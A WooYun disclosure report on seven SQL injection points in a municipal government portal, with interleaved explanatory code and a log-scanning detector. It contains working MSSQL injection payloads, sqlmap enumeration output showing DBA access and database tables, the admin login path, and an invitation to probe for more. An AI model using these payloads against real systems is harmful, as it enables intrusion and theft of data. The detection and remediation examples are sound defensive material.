Vulnerability summary

Defect ID: wooyun-2015-0155211

Title: Multiple GET injections on a municipal open-government portal, bundled (DBA privileges + 7 databases + sensitive information leakage + plaintext passwords allowing back-end login and arbitrary management operations)

Related vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-11-23 19:04

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-23: Details sent to the vendor, awaiting handling
2015-11-27: Vendor confirmed; details visible only to the vendor
2015-12-07: Details opened to core white hats and relevant domain experts
2015-12-17: Details opened to regular white hats
2015-12-27: Details opened to intern white hats
2016-01-11: Details made public

Brief description:

As in the title: several GET parameters are SQL-injectable with DBA privileges; sensitive information can be leaked, passwords are stored in plaintext, and the back end can be entered and operated!

Detailed description:

Site address: (please mask this)

http://**.**.**.**
**.**.**.**


Same site!
Injection location one:
http://***.***.***.***/qygk/ml_lbnr.aspx?id=7775
http://***.***.***.***/default/GzdtListShow.aspx?id=288
http://***.***.***.***/Zxjj/ZrxxListShow.aspx?id=4383
The id parameter is injectable.
Test:
http://***.***.***.***/default/GzdtListShow.aspx?id=288'
Returns an error.

(screenshots 0.jpg, 1.jpg, 2.jpg, 2-1.jpg omitted)


sqlmap test:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: id=288'; IF(7497=7497) SELECT 7497 ELSE DROP FUNCTION AWSX--
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=288' AND 3948=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(112)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3948=3948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(113))) AND 'VAKM'='VAKM
---
[21:26:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[21:26:05] [INFO] fetching current user
[21:26:06] [INFO] retrieved: web
current user: 'web'
[21:26:06] [INFO] fetching current database
[21:26:07] [INFO] retrieved: zwdt
current database: 'zwdt'
[21:26:07] [INFO] testing if current user is DBA
current user is DBA: True
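How the error-based payload above actually reads data, as an added example (not part of the report and not sqlmap's own code): sqlmap wraps the value it wants in two random marker strings spelled out with CHAR() so they survive quote filtering, and feeds the result to CONVERT(INT, ...), which can never succeed and therefore echoes the string back inside SQL Server's conversion error. The CASE in the payload yields CHAR(49) '1' when the condition holds, which is the confirmation step. The error text below is constructed in the format SQL Server 2005 uses for error 245; the report does not show the target's real response body.

```python
import re

# Payload copied from the sqlmap output above for injection point one.
REPORT_PAYLOAD = (
    "id=288' AND 3948=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(112)+"
    "CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3948=3948) THEN CHAR(49) ELSE CHAR(48) "
    "END))+CHAR(113)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(113))) AND 'VAKM'='VAKM"
)

# Constructed SQL Server 2005 response to that payload (error 245); only the
# message format matters, the surrounding ASP.NET error page is not shown.
SAMPLE_ERROR = (
    "System.Data.SqlClient.SqlException: Conversion failed when converting the "
    "nvarchar value 'qspyq1qnlqq' to data type int."
)

CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\+?)+")

def decode_char_runs(payload):
    """Collapse each CHAR(n)+CHAR(m)+... run into the string it spells."""
    runs = []
    for m in CHAR_RUN.finditer(payload):
        codes = re.findall(r"CHAR\((\d+)\)", m.group(0))
        runs.append("".join(chr(int(c)) for c in codes))
    return runs

def markers(payload):
    """sqlmap brackets the smuggled value with a random prefix and suffix;
    they are the first and the last CHAR() runs in the payload."""
    runs = decode_char_runs(payload)
    return runs[0], runs[-1]

def leaked_value(payload, response_text):
    """Pull the value SQL Server echoed back between the two markers.
    CONVERT(INT, 'qspyq...qnlqq') always fails, so the error message carries
    whatever the inner SELECT produced."""
    prefix, suffix = markers(payload)
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), response_text, re.S)
    return m.group(1) if m else None

def explain(payload, response_text):
    """Summarise what the payload tested and what came back."""
    runs = decode_char_runs(payload)
    return {
        "markers": markers(payload),
        "true_branch": runs[1],   # CHAR(49) -> '1' when the CASE condition holds
        "false_branch": runs[2],  # CHAR(48) -> '0' otherwise
        "leaked": leaked_value(payload, response_text),
    }

if __name__ == "__main__":
    print(explain(REPORT_PAYLOAD, SAMPLE_ERROR))
```

Once the confirmation returns '1', the same wrapper carries any scalar subquery, which is how the user 'web', the database 'zwdt' and the table counts further down were retrieved without a blind channel.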

available databases [7]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zwdt
[*] zwdt_change
[*] zwdtUp
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.dm_os_memory_objects | 186997 |
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.dm_os_memory_cache_entries | 39484 |
| sys.syscacheobjects | 38894 |
| sys.dm_exec_cached_plans | 38747 |
| sys.dm_exec_query_stats | 17833 |
| sys.dm_os_buffer_descriptors | 14580 |
| sys.syscolumns | 11157 |
| sys.all_parameters | 6698 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.all_columns | 4254 |
| sys.trace_event_bindings | 3958 |
| sys.system_columns | 3696 |
| sys.dm_os_ring_buffers | 3085 |
| sys.syscomments | 2748 |
| dbo.spt_values | 2346 |
| sys.dm_os_virtual_address_dump | 2080 |
| sys.all_objects | 1808 |
| sys.sysobjects | 1808 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1645 |
| sys.syspermissions | 1644 |
| sys.sysprotects | 1642 |
| sys.all_sql_modules | 1592 |
| sys.system_sql_modules | 1589 |
| sys.dm_os_performance_counters | 723 |
| sys.sysperfinfo | 723 |
| sys.system_internals_partition_columns | 693 |
| sys.columns | 558 |
| sys.dm_exec_query_transformation_stats | 376 |
| sys.stats_columns | 292 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.index_columns | 219 |
| sys.sysindexkeys | 219 |
| sys.dm_os_wait_stats | 194 |
| sys.event_notification_event_types | 193 |
| sys.dm_os_memory_clerks | 175 |
| sys.sysindexes | 174 |
| sys.trace_events | 171 |
| sys.stats | 168 |
| sys.dm_os_latch_stats | 136 |
| sys.dm_os_memory_cache_clock_hands | 114 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.system_internals_allocation_units | 112 |
| sys.dm_db_index_usage_stats | 103 |
| sys.dm_db_partition_stats | 101 |
| sys.indexes | 101 |
| sys.partitions | 101 |
| sys.system_internals_partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.dm_os_loaded_modules | 90 |
| sys.xml_schema_types | 77 |
| sys.objects | 67 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.dm_os_memory_cache_counters | 57 |
| sys.dm_os_threads | 57 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| sys.dm_os_worker_local_storage | 49 |
| sys.dm_os_workers | 49 |
| sys.fulltext_languages | 48 |
| sys.dm_os_memory_pools | 46 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| sys.dm_os_memory_cache_hash_tables | 43 |
| sys.dm_exec_query_optimizer_info | 38 |
| sys.syslanguages | 33 |
| sys.dm_os_tasks | 32 |
| sys.dm_db_session_space_usage | 28 |
| sys.dm_db_task_space_usage | 28 |
| sys.dm_exec_sessions | 28 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.sysprocesses | 24 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.dm_tran_active_transactions | 20 |
| sys.dm_tran_database_transactions | 20 |
| sys.server_principals | 20 |
| sys.dm_exec_requests | 19 |
| sys.server_permissions | 18 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 16 |
| sys.sysusers | 16 |
| sys.dm_db_missing_index_details | 15 |
| sys.dm_db_missing_index_group_stats | 15 |
| sys.dm_db_missing_index_groups | 15 |
| sys.dm_os_stacks | 15 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.master_files | 14 |
| sys.schemas | 14 |
| sys.service_message_types | 14 |
| sys.sysaltfiles | 14 |
| sys.xml_schema_attributes | 14 |
| sys.dm_os_waiting_tasks | 12 |
| sys.dm_os_schedulers | 11 |
| sys.service_contract_message_usages | 11 |
| sys.syslogins | 11 |
| sys.crypt_properties | 8 |
| sys.dm_tran_locks | 8 |
| sys.database_mirroring | 7 |
| sys.database_recovery_status | 7 |
| sys.databases | 7 |
| sys.dm_exec_connections | 7 |
| sys.sysdatabases | 7 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.server_role_members | 6 |
| sys.service_contracts | 6 |
| sys.tables | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.certificates | 5 |
| sys.endpoints | 5 |
| sys.dm_os_hosts | 4 |
| dbo.MSreplication_options | 3 |
| INFORMATION_SCHEMA.ROUTINES | 3 |
| sys.dm_clr_properties | 3 |
| sys.identity_columns | 3 |
| sys.internal_tables | 3 |
| sys.login_token | 3 |
| sys.procedures | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.sql_modules | 3 |
| sys.syslockinfo | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.dm_broker_queue_monitors | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.key_encryptions | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| INFORMATION_SCHEMA.PARAMETERS | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.filegroups | 1 |
| sys.linked_logins | 1 |
| sys.parameters | 1 |
| sys.routes | 1 |
| sys.servers | 1 |
| sys.symmetric_keys | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysoledbusers | 1 |
| sys.sysservers | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: zwdtUp
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.qygk_lb | 2788 |
| dbo.qygk_nsjg | 1007 |
| dbo.qygk_ldcy | 592 |
| dbo.qygk_lmlb | 358 |
| dbo.qygk_nr | 229 |
| dbo.qygk_User | 215 |
| dbo.qygk_dwgl | 209 |
| dbo.qygk_tsdh | 125 |
| dbo.qygk_bsxm | 115 |
| dbo.qygk_dwfl | 25 |
| dbo.qygk_lm | 20 |
+--------------------------------------------------+---------+
Database: zwdt
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.dt_askOnline | 118755 |
| dbo.qygk_wzb | 28000 |
| dbo.dt_manageMail | 12632 |
| dbo.qygk_lb | 3429 |
| dbo.qygk_nsjg | 1759 |
| dbo.qygk_zjjs | 1621 |
| dbo.qygk_ldcy | 903 |
| dbo.qygk_bmgl | 729 |
| dbo.dt_zcfg | 600 |
| dbo.dt_item | 505 |
| dbo.dt_faq | 442 |
| dbo.qygk_lmlb | 373 |
| dbo.qygk_nr | 349 |
| dbo.dt_table | 326 |
| dbo.qygk_bsxm | 303 |
| dbo.qygk_dwgl | 214 |
| dbo.qygk_lmb | 194 |
| dbo.qygk_tsdh | 186 |
| dbo.dt_ryxg | 144 |
| dbo.dt_info | 97 |
| dbo.qygk_News | 81 |
| dbo.dt_dept | 60 |
| dbo.dt_window_tel | 54 |
| dbo.dt_url | 45 |
| dbo.LSB | 45 |
| dbo.qygk_lmlx2 | 26 |
| dbo.qygk_dwfl | 25 |
| dbo.qygk_User | 23 |
| dbo.qygk_lm | 20 |
| dbo.dt_rules | 15 |
| dbo.qygk_qygl | 13 |
| dbo.dt_office_tel | 12 |
| dbo.dt_Zqyjzl | 12 |
| dbo.qygk_lmlx | 10 |
| dbo.s_User | 5 |
| dbo.dt_introduction | 4 |
| dbo.qygk_jsxm | 4 |
| dbo.qygk_NewsLb | 4 |
| dbo.sqlmapoutput | 4 |
| dbo.dt_LsLb | 3 |
+--------------------------------------------------+---------+
Database: zwdt_change
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.qygk_wzb | 28000 |
| dbo.qygk_lb | 2271 |
| dbo.qygk_zjjs | 1621 |
| dbo.qygk_nsjg | 1195 |
| dbo.qygk_bmgl | 729 |
| dbo.dt_zcfg | 600 |
| dbo.dt_item | 505 |
| dbo.qygk_ldcy | 502 |
| dbo.dt_askOnline | 484 |
| dbo.dt_faq | 442 |
| dbo.qygk_lmlb | 358 |
| dbo.dt_table | 326 |
| dbo.qygk_nr | 239 |
| dbo.qygk_lmb | 194 |
| dbo.qygk_dwgl | 192 |
| dbo.qygk_bsxm | 155 |
| dbo.qygk_tsdh | 116 |
| dbo.dt_ryxg | 112 |
| dbo.dt_window_tel | 93 |
| dbo.dt_dept | 60 |
| dbo.dt_manageMail | 54 |
| dbo.dt_url | 50 |
| dbo.dt_info | 47 |
| dbo.qygk_News | 28 |
| dbo.qygk_lmlx2 | 26 |
| dbo.qygk_dwfl | 25 |
| dbo.qygk_User | 21 |
| dbo.qygk_lm | 20 |
| dbo.dt_rules | 15 |
| dbo.dt_office_tel | 13 |
| dbo.qygk_qygl | 13 |
| dbo.qygk_lmlx | 10 |
| dbo.dt_introduction | 4 |
| dbo.qygk_jsxm | 4 |
| dbo.qygk_NewsLb | 4 |
| dbo.dt_LsLb | 3 |
| dbo.s_User | 2 |
+--------------------------------------------------+---------+


(screenshots 3.jpg, 4.jpg, 5.jpg, 6.jpg, 7.jpg omitted)

Injection point two:
http://***.***.***.***/ckdw/main.aspx?no=3367

GET parameter 'no' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: no
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: no=3367' AND 9910=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9910=9910) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(109)+CHAR(104)+CHAR(113))) AND 'psZS'='psZS
---
[01:04:25] [INFO] testing Microsoft SQL Server
[01:04:26] [INFO] confirming Microsoft SQL Server
[01:04:27] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:04:27] [INFO] fetching current user
[01:04:27] [INFO] retrieved: web
current user: 'web'
[01:04:27] [INFO] fetching current database
[01:04:28] [INFO] retrieved: zwdt
current database: 'zwdt'
[01:04:28] [INFO] testing if current user is DBA
current user is DBA: True


Injection point three:
http://***.***.***.***/ckdw/item.aspx?id=6100be95-2317-4c8a-b279-73bec4b57954

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=6100be95-2317-4c8a-b279-73bec4b57954' AND 6574=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(99)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (6574=6574) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(103)+CHAR(113))) AND 'coYu'='coYu
---
[01:07:45] [INFO] testing Microsoft SQL Server
[01:07:46] [INFO] confirming Microsoft SQL Server
[01:07:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:07:47] [INFO] fetching current user
[01:07:47] [INFO] retrieved: web
current user: 'web'
[01:07:47] [INFO] fetching current database
[01:07:48] [INFO] retrieved: zwdt
current database: 'zwdt'
[01:07:48] [INFO] testing if current user is DBA
current user is DBA: True


Injection point four:
http://***.***.***.***/qygk/list.aspx?qyid=1&bmid=2386&lmid=1003001

GET parameter 'lmid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 186 HTTP(s) requests:
---
Place: GET
Parameter: bmid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: qyid=1&bmid=2386' AND 3134=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3134=3134) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(100)+CHAR(116)+CHAR(113))) AND 'cChZ'='cChZ&lmid=1003001
Place: GET
Parameter: lmid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: qyid=1&bmid=2386&lmid=1003001' AND 2738=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2738=2738) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(100)+CHAR(116)+CHAR(113))) AND 'ORQa'='ORQa
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: bmid, type: Single quoted string (default)
[1] place: GET, parameter: lmid, type: Single quoted string
[q] Quit
> 0
[01:21:03] [INFO] testing Microsoft SQL Server
[01:21:04] [INFO] confirming Microsoft SQL Server
[01:21:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:21:06] [INFO] fetching current user
[01:21:06] [INFO] retrieved: web
current user: 'web'
[01:21:06] [INFO] fetching current database
[01:21:07] [INFO] retrieved: zwdt
current database: 'zwdt'
[01:21:07] [INFO] testing if current user is DBA
current user is DBA: True


Injection point five:
http://***.***.***.***/qygk/main.aspx?qy=1&lmid=1022

Test without --level 3:
GET parameter 'lmid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
---
Place: GET
Parameter: lmid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: qy=1&lmid=1022%' AND 9519=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(101)+CHAR(115)+CHAR(113)+(SELECT (CASE WHEN (9519=9519) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(109)+CHAR(113))) AND '%'='
---
[01:54:57] [INFO] testing Microsoft SQL Server
[01:54:57] [INFO] confirming Microsoft SQL Server
[01:54:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:54:59] [INFO] fetching current user
[01:55:00] [INFO] retrieved: web
current user: 'web'
[01:55:00] [INFO] fetching current database
[01:55:00] [INFO] retrieved: zwdt
current database: 'zwdt'
[01:55:00] [INFO] testing if current user is DBA
current user is DBA: True
Test with --level 3:
GET parameter 'lmid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 464 HTTP(s) requests:
---
Place: GET
Parameter: lmid
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: qy=1&lmid=1022'; IF(9421=9421) SELECT 9421 ELSE DROP FUNCTION klvV--
---
[01:53:16] [INFO] testing Microsoft SQL Server
[01:53:16] [INFO] confirming Microsoft SQL Server
[01:53:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:53:18] [INFO] fetching current user
[01:53:18] [INFO] retrieving the length of query output
[01:53:18] [INFO] retrieved: 3
[01:53:24] [INFO] retrieved: web
current user: 'web'
[01:53:24] [INFO] fetching current database
[01:53:24] [INFO] retrieving the length of query output
[01:53:24] [INFO] retrieved: 4
[01:53:33] [INFO] retrieved: zwdt
current database: 'zwdt'
[01:53:33] [INFO] testing if current user is DBA
current user is DBA: True


Injection point six:
http://***.***.***.***/Zxjj/Zxjs.aspx?lb=d

GET parameter 'lb' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Place: GET
Parameter: lb
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lb=d' AND 5848=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(121)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (5848=5848) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(113))) AND 'CXVm'='CXVm
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lb=d'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: lb=d' WAITFOR DELAY '0:0:5'--
---
[01:57:12] [INFO] testing Microsoft SQL Server
[01:57:15] [INFO] confirming Microsoft SQL Server
[01:57:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:57:17] [INFO] fetching current user
[01:57:17] [INFO] retrieved: web
current user: 'web'
[01:57:17] [INFO] fetching current database
[01:57:17] [INFO] retrieved: zwdt
current database: 'zwdt'
[01:57:17] [INFO] testing if current user is DBA
current user is DBA: True


Injection point seven:
http://***.***.***.***/Zxjj/LstdListN.aspx?lb=02

GET parameter 'lb' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
---
Place: GET
Parameter: lb
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lb=02' AND 9444=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(100)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (9444=9444) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(120)+CHAR(99)+CHAR(113))) AND 'KBxT'='KBxT
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lb=02'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: lb=02' WAITFOR DELAY '0:0:5'--
---
[02:01:39] [INFO] testing Microsoft SQL Server
[02:01:40] [INFO] confirming Microsoft SQL Server
[02:01:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[02:01:41] [INFO] fetching current user
[02:01:41] [INFO] retrieved: web
current user: 'web'
[02:01:41] [INFO] fetching current database
[02:01:42] [INFO] retrieved: zwdt
current database: 'zwdt'
[02:01:42] [INFO] testing if current user is DBA
current user is DBA: True
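The defender's view of the seven runs above, as an added example that is not part of the report: sqlmap fingerprints the target as IIS 7.5, so every request shown here would sit in its W3C extended logs. The excerpt below is constructed (IPs, times, user agents and the #Fields layout are invented; the query strings replay the payload shapes from the output above, percent-encoded the way IIS records them). The scanner URL-decodes cs-uri-query, matches the SQL Server-specific shapes, and uses sc-status and time-taken to separate confirmed behaviour (the quote probe that produced a 500, a WAITFOR DELAY that really cost five seconds) from mere attempts.

```python
import re
from urllib.parse import unquote

# Constructed IIS 7.5 W3C log excerpt (not from the report). Hosts, IPs and
# times are invented; the query strings follow the payload shapes shown above.
# IIS writes spaces inside a field as '+', so each field is one token.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2015-11-23 13:26:04 10.0.0.5 GET /default/GzdtListShow.aspx id=288 80 - 198.51.100.7 Mozilla/5.0 200 0 0 31
2015-11-23 13:26:05 10.0.0.5 GET /default/GzdtListShow.aspx id=288%27 80 - 198.51.100.7 Mozilla/5.0 500 0 0 15
2015-11-23 13:26:06 10.0.0.5 GET /default/GzdtListShow.aspx id=288%27%20AND%203948%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%29%29%20AND%20%27VAKM%27%3D%27VAKM 80 - 198.51.100.7 sqlmap/1.0-dev 500 0 0 16
2015-11-23 13:57:12 10.0.0.5 GET /Zxjj/Zxjs.aspx lb=d%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 80 - 198.51.100.7 Mozilla/5.0 200 0 0 5031
2015-11-23 13:58:00 10.0.0.5 GET /qygk/list.aspx qyid=1&bmid=2386&lmid=1003001 80 - 203.0.113.9 Mozilla/5.0 200 0 0 20
"""

# Indicator names and the decoded query-string shapes seen in the report.
RULES = [
    ("mssql_error_based", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)),
    ("char_encoding",     re.compile(r"CHAR\s*\(\s*\d+\s*\)", re.I)),
    ("time_based",        re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("stacked_query",     re.compile(r"'\s*;\s*(?:IF|SELECT|WAITFOR|DROP|EXEC)", re.I)),
    ("tautology_tail",    re.compile(r"AND\s+'(\w+)'\s*=\s*'\1", re.I)),
]

def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def classify(row):
    """Return the injection indicators a single log row matches."""
    query = unquote(row.get("cs-uri-query", ""))
    hits = [name for name, rx in RULES if rx.search(query)]
    # A lone quote that flips the page to HTTP 500 is the manual probe from
    # the report (id=288' -> error): the quote reached the SQL parser.
    if "'" in query and row.get("sc-status") == "500":
        hits.append("quote_probe_error")
    # If a WAITFOR DELAY '0:0:5' request really took >= 5 s, the stacked
    # statement executed: that is confirmation, not just an attempt.
    if "time_based" in hits and int(row.get("time-taken", 0)) >= 5000:
        hits.append("delay_executed")
    return hits

def scan(text):
    """Map each flagged (client IP, URI stem) pair to the indicators seen."""
    findings = {}
    for row in parse_w3c(text):
        hits = classify(row)
        if hits:
            key = (row["c-ip"], row["cs-uri-stem"])
            findings.setdefault(key, set()).update(hits)
    return findings

if __name__ == "__main__":
    for key, hits in scan(SAMPLE_LOG).items():
        print(key, sorted(hits))
```

The point of the two status-based checks is triage: a WAF will see the CONVERT(INT, ...) shape on any scanner run, but a 500 on a bare quote and a 5 s time-taken on a WAITFOR request are the server telling you the injection worked, which is what separates "we were scanned" from "we were read".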


There are probably more injectable GET parameters; check for them yourselves!
Back-end login address:
http://***.***.***.***/manage/Default/admin_login.aspx

(screenshot 8.jpg omitted)


There is no verification on the login, so it could be brute-forced; I did not test that.

Proof of vulnerability:

As above

Fix:

Filter input
Add verification to the login
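The defect behind all seven injection points and the standard fix for it, as an added example (not the portal's code, which the report does not show): Python's sqlite3 stands in for SQL Server 2005, so CONVERT(INT, ...) and WAITFOR from the payloads above do not apply and a generic UNION tail makes the same point. Table names borrow qygk_lb and qygk_User from the listing above; columns and rows are constructed. show_vulnerable builds the statement by string concatenation, which is exactly what turns id=288' into a server error; show_fixed binds the value instead.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the portal's database. Table names follow the
    report's listing (qygk_lb, qygk_User); columns and rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE qygk_lb (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE qygk_User (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO qygk_lb VALUES (288, 'Work dynamics item 288');
        INSERT INTO qygk_User VALUES (1, 'admin', 'constructed-plaintext-password');
    """)
    return con

def show_vulnerable(con, id_param):
    """The pattern behind the finding: the GET value is spliced into the SQL
    text. id=288' closes the literal early and the parser errors out (the
    'returns an error' probe), and a well-formed tail runs as SQL."""
    sql = "SELECT title FROM qygk_lb WHERE id='" + id_param + "'"
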